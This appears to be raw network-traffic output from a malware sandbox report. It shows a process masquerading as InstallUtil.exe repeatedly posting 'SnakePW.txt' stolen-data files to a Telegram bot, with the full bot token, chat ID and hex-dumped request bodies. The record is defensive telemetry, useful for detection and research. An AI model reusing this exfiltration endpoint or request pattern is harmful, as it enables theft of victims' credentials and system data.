                                                                                    Data Ascii: {"ok":true,"result":{"message_id":132,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765192


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    33192.168.2.550019149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:33 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd36beed30dc9a
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:33 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 62 65 65 64 33 30 64 63 39 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd36beed30dc9aContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:33 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:33 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:33 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 39 33
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":133,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765193


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    34192.168.2.550020149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:34 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd36d6d0b153df
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:34 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 64 36 64 30 62 31 35 33 64 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd36d6d0b153dfContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:34 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:34 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:34 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 39 34
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":134,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765194


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    35192.168.2.550021149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:35 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd36f26cf37706
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:35 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 36 66 32 36 63 66 33 37 37 30 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd36f26cf37706Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:35 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:35 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:35 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 39 35
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":135,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765195


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    36192.168.2.550022149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:36 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd370f3da9de1d
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:36 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 37 30 66 33 64 61 39 64 65 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd370f3da9de1dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:36 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:36 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:36 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 39 36
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":136,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765196


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    37192.168.2.550023149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:36 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd372c02c06542
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:36 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 37 32 63 30 32 63 30 36 35 34 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd372c02c06542Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:37 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:37 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:37 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 39 37
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":137,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765197


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    38192.168.2.550024149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:37 UTC328OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd374ef5ec923c
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    2025-01-13 10:46:37 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 37 34 65 66 35 65 63 39 32 33 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd374ef5ec923cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:38 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:38 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:38 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 39 38
                                                                                    Data Ascii: {"ok":true,"result":{"message_id":138,"from":{"id":7500935106,"is_bot":true,"first_name":"CARNAGE","username":"CARNAGE007_bot"},"chat":{"id":1018401531,"first_name":"Gaddafi","last_name":"Junior","username":"GADDAFI_JR","type":"private"},"date":1736765198


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    39192.168.2.550025149.154.167.2204435148C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-01-13 10:46:38 UTC352OUTPOST /bot7500935106:AAHefL_Tof6QlJbfgUl9eKB1_ggGz2K7LgY/sendDocument?chat_id=1018401531&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd377099791370
                                                                                    Host: api.telegram.org
                                                                                    Content-Length: 570
                                                                                    Connection: Keep-Alive
                                                                                    2025-01-13 10:46:38 UTC570OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 37 37 30 39 39 37 39 31 33 37 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 35 34 39 31 36 33 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 31 33 2f 30 31 2f 32 30 32 35 20 2f 20 30 35 3a 34 35 3a 31 36 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                                                                    Data Ascii: --------------------------8dd377099791370Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:549163Date and Time: 13/01/2025 / 05:45:16Client IP:
                                                                                    2025-01-13 10:46:39 UTC388INHTTP/1.1 200 OK
                                                                                    Server: nginx/1.18.0
                                                                                    Date: Mon, 13 Jan 2025 10:46:39 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 522
                                                                                    Connection: close
                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                    2025-01-13 10:46:39 UTC522INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 35 30 30 39 33 35 31 30 36 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 43 41 52 4e 41 47 45 30 30 37 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 30 31 38 34 30 31 35 33 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 47 61 64 64 61 66 69 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 4a 75 6e 69 6f 72 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 47 41 44 44 41 46 49 5f 4a 52 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 37 36 35 31 39 39
